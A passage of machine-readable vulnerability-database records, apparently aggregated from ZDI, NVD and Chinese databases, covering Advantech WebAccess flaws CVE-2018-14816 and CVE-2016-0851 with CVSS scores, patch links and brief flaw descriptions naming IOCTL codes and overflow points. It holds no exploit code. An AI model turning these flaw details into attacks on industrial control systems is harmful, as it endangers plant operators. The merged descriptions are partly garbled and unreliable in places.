}, { "db": "ZDI", "id": "ZDI-18-1314" }, { "db": "ZDI", "id": "ZDI-18-1307" }, { "db": "ZDI", "id": "ZDI-18-1300" }, { "db": "ZDI", "id": "ZDI-18-1298" }, { "db": "ZDI", "id": "ZDI-18-1313" }, { "db": "ZDI", "id": "ZDI-18-1303" }, { "db": "ZDI", "id": "ZDI-18-1304" }, { "db": "ZDI", "id": "ZDI-18-1305" }, { "db": "ZDI", "id": "ZDI-18-1309" }, { "db": "ZDI", "id": "ZDI-18-1306" }, { "db": "CNVD", "id": "CNVD-2018-21935" }, { "db": "BID", "id": "105728" }, { "db": "CNNVD", "id": "CNNVD-201810-1188" }, { "db": "NVD", "id": "CVE-2018-14816" } ] }, "credits": { "_id": null, "data": "Mat Powell of Trend Micro Zero Day Initiative", "sources": [ { "db": "ZDI", "id": "ZDI-18-1311" }, { "db": "ZDI", "id": "ZDI-18-1312" }, { "db": "ZDI", "id": "ZDI-18-1308" }, { "db": "ZDI", "id": "ZDI-18-1310" }, { "db": "ZDI", "id": "ZDI-18-1314" }, { "db": "ZDI", "id": "ZDI-18-1307" }, { "db": "ZDI", "id": "ZDI-18-1300" }, { "db": "ZDI", "id": "ZDI-18-1298" }, { "db": "ZDI", "id": "ZDI-18-1313" }, { "db": "ZDI", "id": "ZDI-18-1303" }, { "db": "ZDI", "id": "ZDI-18-1304" }, { "db": "ZDI", "id": "ZDI-18-1305" }, { "db": "ZDI", "id": "ZDI-18-1309" }, { "db": "ZDI", "id": "ZDI-18-1306" }, { "db": "BID", "id": "105728" } ], "trust": 10.1 }, "cve": "CVE-2018-14816", "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.6, "id": "CVE-2018-14816", "impactScore": 10.0, "integrityImpact": "COMPLETE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 9.8, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2018-14816", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 1.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2018-21935", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "e2feefe1-39ab-11e9-8e28-000c29342cb1", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2018-14816", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" } ], "severity": [ { "author": "ZDI", "id": "CVE-2018-14816", "trust": 9.8, "value": "HIGH" }, { "author": "nvd@nist.gov", "id": "CVE-2018-14816", "trust": 1.0, "value": "CRITICAL" }, { "author": "CNVD", "id": "CNVD-2018-21935", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201810-1188", "trust": 0.6, "value": "CRITICAL" }, { "author": "IVD", "id": "e2feefe1-39ab-11e9-8e28-000c29342cb1", "trust": 0.2, "value": "CRITICAL" } ] } ], "sources": [ { "db": "IVD", "id": "e2feefe1-39ab-11e9-8e28-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-18-1311" }, { "db": "ZDI", "id": "ZDI-18-1312" }, { "db": "ZDI", "id": "ZDI-18-1308" }, { "db": "ZDI", "id": "ZDI-18-1310" }, { "db": "ZDI", "id": "ZDI-18-1314" }, { "db": "ZDI", "id": "ZDI-18-1307" }, { "db": "ZDI", "id": "ZDI-18-1300" }, { "db": "ZDI", "id": "ZDI-18-1298" }, { "db": "ZDI", "id": "ZDI-18-1313" }, { "db": "ZDI", "id": "ZDI-18-1303" }, { "db": "ZDI", "id": "ZDI-18-1304" }, { "db": "ZDI", "id": "ZDI-18-1305" }, { "db": "ZDI", "id": "ZDI-18-1309" }, { "db": "ZDI", "id": "ZDI-18-1306" }, { "db": "CNVD", "id": "CNVD-2018-21935" }, { "db": "CNNVD", "id": "CNNVD-201810-1188" }, { "db": "NVD", "id": "CVE-2018-14816" } ] }, "description": { "_id": null, "data": "Advantech WebAccess 8.3.1 and earlier has several stack-based buffer overflow vulnerabilities that have been identified, which may allow an attacker to execute arbitrary code. Authentication is not required to exploit this vulnerability.The specific flaw exists within bwclient.exe, which is accessed through the 0x2711 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this functionality to execute code under the context of Administrator. Advantech (Advantech) WebAccess software is the core of Advantech\u0027s IoT application platform solution, providing users with a user interface based on HTML5 technology to achieve cross-platform and cross-browser data access experience. A stack buffer overflow vulnerability exists in Advantech WebAccess. Advantech WebAccess is prone to the following security vulnerabilities:\n1. A directory-traversal vulnerability\n3. An arbitrary-file-deletion vulnerability\n4. This may aid in further attacks. \nAdvantech WebAccess 8.3.1 and prior versions are vulnerable", "sources": [ { "db": "NVD", "id": "CVE-2018-14816" }, { "db": "ZDI", "id": "ZDI-18-1298" }, { "db": "ZDI", "id": "ZDI-18-1306" }, { "db": "ZDI", "id": "ZDI-18-1309" }, { "db": "ZDI", "id": "ZDI-18-1305" }, { "db": "ZDI", "id": "ZDI-18-1304" }, { "db": "ZDI", "id": "ZDI-18-1303" }, { "db": "ZDI", "id": "ZDI-18-1311" }, { "db": "ZDI", "id": "ZDI-18-1313" }, { "db": "ZDI", "id": "ZDI-18-1300" }, { "db": "ZDI", "id": "ZDI-18-1307" }, { "db": "ZDI", "id": "ZDI-18-1314" }, { "db": "ZDI", "id": "ZDI-18-1310" }, { "db": "ZDI", "id": "ZDI-18-1308" }, { "db": "ZDI", "id": "ZDI-18-1312" }, { "db": "CNVD", "id": "CNVD-2018-21935" }, { "db": "BID", "id": "105728" }, { "db": "IVD", "id": "e2feefe1-39ab-11e9-8e28-000c29342cb1" } ], "trust": 10.71 }, "external_ids": { "_id": null, "data": [ { "db": "NVD", "id": "CVE-2018-14816", "trust": 12.5 }, { "db": "ICS CERT", "id": "ICSA-18-296-01", "trust": 2.5 }, { "db": "BID", "id": "105728", "trust": 2.5 }, { "db": "SECTRACK", "id": "1041939", "trust": 1.6 }, { "db": "CNVD", "id": "CNVD-2018-21935", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201810-1188", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-6299", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-1311", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-6300", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-1312", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-6296", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-1308", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-6298", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-1310", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-6302", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-1314", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-6295", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-1307", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-6287", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-1300", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-6285", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-1298", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-6301", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-1313", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-6290", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-1303", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-6292", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-1304", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-6293", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-1305", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-6297", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-1309", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-6294", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-1306", "trust": 0.7 }, { "db": "IVD", "id": "E2FEEFE1-39AB-11E9-8E28-000C29342CB1", "trust": 0.2 } ], "sources": [ { "db": "IVD", "id": "e2feefe1-39ab-11e9-8e28-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-18-1311" }, { "db": "ZDI", "id": "ZDI-18-1312" }, { "db": "ZDI", "id": "ZDI-18-1308" }, { "db": "ZDI", "id": "ZDI-18-1310" }, { "db": "ZDI", "id": "ZDI-18-1314" }, { "db": "ZDI", "id": "ZDI-18-1307" }, { "db": "ZDI", "id": "ZDI-18-1300" }, { "db": "ZDI", "id": "ZDI-18-1298" }, { "db": "ZDI", "id": "ZDI-18-1313" }, { "db": "ZDI", "id": "ZDI-18-1303" }, { "db": "ZDI", "id": "ZDI-18-1304" }, { "db": "ZDI", "id": "ZDI-18-1305" }, { "db": "ZDI", "id": "ZDI-18-1309" }, { "db": "ZDI", "id": "ZDI-18-1306" }, { "db": "CNVD", "id": "CNVD-2018-21935" }, { "db": "BID", "id": "105728" }, { "db": "CNNVD", "id": "CNNVD-201810-1188" }, { "db": "NVD", "id": "CVE-2018-14816" } ] }, "id": "VAR-201810-0396", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "e2feefe1-39ab-11e9-8e28-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-21935" } ], "trust": 1.33993413 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "e2feefe1-39ab-11e9-8e28-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-21935" } ] }, "last_update_date": "2024-11-29T22:51:21.315000Z", "patch": { "_id": null, "data": [ { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 9.8, "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-296-01" }, { "title": "Patch for Advantech WebAccess Stack Buffer Overflow Vulnerability (CNVD-2018-21935)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/143393" }, { "title": "Advantech WebAccess Buffer error vulnerability fix", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=86280" } ], "sources": [ { "db": "ZDI", "id": "ZDI-18-1311" }, { "db": "ZDI", "id": "ZDI-18-1312" }, { "db": "ZDI", "id": "ZDI-18-1308" }, { "db": "ZDI", "id": "ZDI-18-1310" }, { "db": "ZDI", "id": "ZDI-18-1314" }, { "db": "ZDI", "id": "ZDI-18-1307" }, { "db": "ZDI", "id": "ZDI-18-1300" }, { "db": "ZDI", "id": "ZDI-18-1298" }, { "db": "ZDI", "id": "ZDI-18-1313" }, { "db": "ZDI", "id": "ZDI-18-1303" }, { "db": "ZDI", "id": "ZDI-18-1304" }, { "db": "ZDI", "id": "ZDI-18-1305" }, { "db": "ZDI", "id": "ZDI-18-1309" }, { "db": "ZDI", "id": "ZDI-18-1306" }, { "db": "CNVD", "id": "CNVD-2018-21935" }, { "db": "CNNVD", "id": "CNNVD-201810-1188" } ] }, "problemtype_data": { "_id": null, "data": [ { "problemtype": "CWE-121", "trust": 1.0 }, { "problemtype": "CWE-787", "trust": 1.0 } ], "sources": [ { "db": "NVD", "id": "CVE-2018-14816" } ] }, "references": { "_id": null, "data": [ { "trust": 11.3, "url": "https://ics-cert.us-cert.gov/advisories/icsa-18-296-01" }, { "trust": 1.6, "url": "http://www.securityfocus.com/bid/105728" }, { "trust": 1.6, "url": "http://www.securitytracker.com/id/1041939" }, { "trust": 1.0, "url": "https://ics-cert.us-cert.gov/advisories/icsa-18-296-01%2c" }, { "trust": 0.3, "url": "http://webaccess.advantech.com" } ], "sources": [ { "db": "ZDI", "id": "ZDI-18-1311" }, { "db": "ZDI", "id": "ZDI-18-1312" }, { "db": "ZDI", "id": "ZDI-18-1308" }, { "db": "ZDI", "id": "ZDI-18-1310" }, { "db": "ZDI", "id": "ZDI-18-1314" }, { "db": "ZDI", "id": "ZDI-18-1307" }, { "db": "ZDI", "id": "ZDI-18-1300" }, { "db": "ZDI", "id": "ZDI-18-1298" }, { "db": "ZDI", "id": "ZDI-18-1313" }, { "db": "ZDI", "id": "ZDI-18-1303" }, { "db": "ZDI", "id": "ZDI-18-1304" }, { "db": "ZDI", "id": "ZDI-18-1305" }, { "db": "ZDI", "id": "ZDI-18-1309" }, { "db": "ZDI", "id": "ZDI-18-1306" }, { "db": "CNVD", "id": "CNVD-2018-21935" }, { "db": "BID", "id": "105728" }, { "db": "CNNVD", "id": "CNNVD-201810-1188" }, { "db": "NVD", "id": "CVE-2018-14816" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "e2feefe1-39ab-11e9-8e28-000c29342cb1", "ident": null }, { "db": "ZDI", "id": "ZDI-18-1311", "ident": null }, { "db": "ZDI", "id": "ZDI-18-1312", "ident": null }, { "db": "ZDI", "id": "ZDI-18-1308", "ident": null }, { "db": "ZDI", "id": "ZDI-18-1310", "ident": null }, { "db": "ZDI", "id": "ZDI-18-1314", "ident": null }, { "db": "ZDI", "id": "ZDI-18-1307", "ident": null }, { "db": "ZDI", "id": "ZDI-18-1300", "ident": null }, { "db": "ZDI", "id": "ZDI-18-1298", "ident": null }, { "db": "ZDI", "id": "ZDI-18-1313", "ident": null }, { "db": "ZDI", "id": "ZDI-18-1303", "ident": null }, { "db": "ZDI", "id": "ZDI-18-1304", "ident": null }, { "db": "ZDI", "id": "ZDI-18-1305", "ident": null }, { "db": "ZDI", "id": "ZDI-18-1309", "ident": null }, { "db": "ZDI", "id": "ZDI-18-1306", "ident": null }, { "db": "CNVD", "id": "CNVD-2018-21935", "ident": null }, { "db": "BID", "id": "105728", "ident": null }, { "db": "CNNVD", "id": "CNNVD-201810-1188", "ident": null }, { "db": "NVD", "id": "CVE-2018-14816", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2018-10-28T00:00:00", "db": "IVD", "id": "e2feefe1-39ab-11e9-8e28-000c29342cb1", "ident": null }, { "date": "2018-10-24T00:00:00", "db": "ZDI", "id": "ZDI-18-1311", "ident": null }, { "date": "2018-10-24T00:00:00", "db": "ZDI", "id": "ZDI-18-1312", "ident": null }, { "date": "2018-10-24T00:00:00", "db": "ZDI", "id": "ZDI-18-1308", "ident": null }, { "date": "2018-10-24T00:00:00", "db": "ZDI", "id": "ZDI-18-1310", "ident": null }, { "date": "2018-10-24T00:00:00", "db": "ZDI", "id": "ZDI-18-1314", "ident": null }, { "date": "2018-10-24T00:00:00", "db": "ZDI", "id": "ZDI-18-1307", "ident": null }, { "date": "2018-10-24T00:00:00", "db": "ZDI", "id": "ZDI-18-1300", "ident": null }, { "date": "2018-10-24T00:00:00", "db": "ZDI", "id": "ZDI-18-1298", "ident": null }, { "date": "2018-10-24T00:00:00", "db": "ZDI", "id": "ZDI-18-1313", "ident": null }, { "date": "2018-10-24T00:00:00", "db": "ZDI", "id": "ZDI-18-1303", "ident": null }, { "date": "2018-10-24T00:00:00", "db": "ZDI", "id": "ZDI-18-1304", "ident": null }, { "date": "2018-10-24T00:00:00", "db": "ZDI", "id": "ZDI-18-1305", "ident": null }, { "date": "2018-10-24T00:00:00", "db": "ZDI", "id": "ZDI-18-1309", "ident": null }, { "date": "2018-10-24T00:00:00", "db": "ZDI", "id": "ZDI-18-1306", "ident": null }, { "date": "2018-10-28T00:00:00", "db": "CNVD", "id": "CNVD-2018-21935", "ident": null }, { "date": "2018-10-23T00:00:00", "db": "BID", "id": "105728", "ident": null }, { "date": "2018-10-24T00:00:00", "db": "CNNVD", "id": "CNNVD-201810-1188", "ident": null }, { "date": "2018-10-23T20:29:00.530000", "db": "NVD", "id": "CVE-2018-14816", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2018-10-24T00:00:00", "db": "ZDI", "id": "ZDI-18-1311", "ident": null }, { "date": "2018-10-24T00:00:00", "db": "ZDI", "id": "ZDI-18-1312", "ident": null }, { "date": "2018-10-24T00:00:00", "db": "ZDI", "id": "ZDI-18-1308", "ident": null }, { "date": "2018-10-24T00:00:00", "db": "ZDI", "id": "ZDI-18-1310", "ident": null }, { "date": "2018-10-24T00:00:00", "db": "ZDI", "id": "ZDI-18-1314", "ident": null }, { "date": "2018-10-24T00:00:00", "db": "ZDI", "id": "ZDI-18-1307", "ident": null }, { "date": "2018-10-24T00:00:00", "db": "ZDI", "id": "ZDI-18-1300", "ident": null }, { "date": "2018-10-24T00:00:00", "db": "ZDI", "id": "ZDI-18-1298", "ident": null }, { "date": "2018-10-24T00:00:00", "db": "ZDI", "id": "ZDI-18-1313", "ident": null }, { "date": "2018-10-24T00:00:00", "db": "ZDI", "id": "ZDI-18-1303", "ident": null }, { "date": "2018-10-24T00:00:00", "db": "ZDI", "id": "ZDI-18-1304", "ident": null }, { "date": "2018-10-24T00:00:00", "db": "ZDI", "id": "ZDI-18-1305", "ident": null }, { "date": "2018-10-24T00:00:00", "db": "ZDI", "id": "ZDI-18-1309", "ident": null }, { "date": "2018-10-24T00:00:00", "db": "ZDI", "id": "ZDI-18-1306", "ident": null }, { "date": "2018-10-28T00:00:00", "db": "CNVD", "id": "CNVD-2018-21935", "ident": null }, { "date": "2018-10-23T00:00:00", "db": "BID", "id": "105728", "ident": null }, { "date": "2019-10-17T00:00:00", "db": "CNNVD", "id": "CNNVD-201810-1188", "ident": null }, { "date": "2024-11-21T03:49:51.383000", "db": "NVD", "id": "CVE-2018-14816", "ident": null } ] }, "threat_type": { "_id": null, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201810-1188" } ], "trust": 0.6 }, "title": { "_id": null, "data": "Advantech WebAccess Client bwwebv Stack-based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-18-1312" }, { "db": "ZDI", "id": "ZDI-18-1304" } ], "trust": 1.4 }, "type": { "_id": null, "data": "Buffer error", "sources": [ { "db": "IVD", "id": "e2feefe1-39ab-11e9-8e28-000c29342cb1" }, { "db": "CNNVD", "id": "CNNVD-201810-1188" } ], "trust": 0.8 } }
var-201601-0033
Vulnerability from variot
Advantech WebAccess before 8.1 allows remote attackers to cause a denial of service (out-of-bounds memory access) via unspecified vectors. Advantech WebAccess There is a service disruption ( Access outside the memory area ) There are vulnerabilities that are put into a state.Service disruption by a third party ( Access outside the memory area ) There is a possibility of being put into a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x13881 IOCTL in the BwOpcTool subsystem. An uncontrolled format string vulnerability exists in a call to sprintf. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system. WebAccess HMI/SCADA software provides remote control and management, allowing users to easily view and configure automation equipment in facility management systems, power stations and building automation systems. Advantech WebAccess is prone to following security vulnerabilities: 1. A denial-of-service vulnerability 2. An arbitrary file-upload vulnerability 3. A directory-traversal vulnerability 4. Multiple stack-based buffer-overflow vulnerabilities 5. A heap-based buffer overflow vulnerability 6. Multiple buffer-overflow vulnerabilities 7. Multiple information disclosure vulnerabilities 8. A cross-site scripting vulnerability 9. An SQL-injection vulnerability 10. A cross-site request forgery vulnerability 11. This may aid in further attacks. Advantech WebAccess 8.0 and prior versions are vulnerable. Advantech WebAccess is a browser-based HMI/SCADA software developed by Advantech
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201601-0033", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "lt", "trust": 1.4, "vendor": "advantech", "version": "8.1" }, { "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "8.0" }, { "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "8.0" }, { "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8" }, { "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "7.2" }, { "model": "webaccess", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": "8.1" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "64d581ec-2351-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-16-052" }, { "db": "CNVD", "id": "CNVD-2016-00428" }, { "db": "BID", "id": "80745" }, { "db": "JVNDB", "id": "JVNDB-2016-001072" }, { "db": "CNNVD", "id": "CNNVD-201601-324" }, { "db": "NVD", "id": "CVE-2016-0851" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-001072" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-16-052" } ], "trust": 0.7 }, "cve": "CVE-2016-0851", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "CVE-2016-0851", "impactScore": 6.9, "integrityImpact": "NONE", "severity": "HIGH", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.6, "id": "CVE-2016-0851", "impactScore": 10.0, "integrityImpact": "COMPLETE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "CNVD-2016-00428", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "64d581ec-2351-11e6-abef-000c29c66e3d", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "VHN-88361", "impactScore": 6.9, "integrityImpact": "NONE", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:C", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "exploitabilityScore": 3.9, "id": "CVE-2016-0851", "impactScore": 3.6, "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2016-0851", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2016-0851", "trust": 0.8, "value": "High" }, { "author": "ZDI", "id": "CVE-2016-0851", "trust": 0.7, "value": "HIGH" }, { "author": "CNVD", "id": "CNVD-2016-00428", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201601-324", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "64d581ec-2351-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-88361", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "64d581ec-2351-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-16-052" }, { "db": "CNVD", "id": "CNVD-2016-00428" }, { "db": "VULHUB", "id": "VHN-88361" }, { "db": "JVNDB", "id": "JVNDB-2016-001072" }, { "db": "CNNVD", "id": "CNNVD-201601-324" }, { "db": "NVD", "id": "CVE-2016-0851" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess before 8.1 allows remote attackers to cause a denial of service (out-of-bounds memory access) via unspecified vectors. Advantech WebAccess There is a service disruption ( Access outside the memory area ) There are vulnerabilities that are put into a state.Service disruption by a third party ( Access outside the memory area 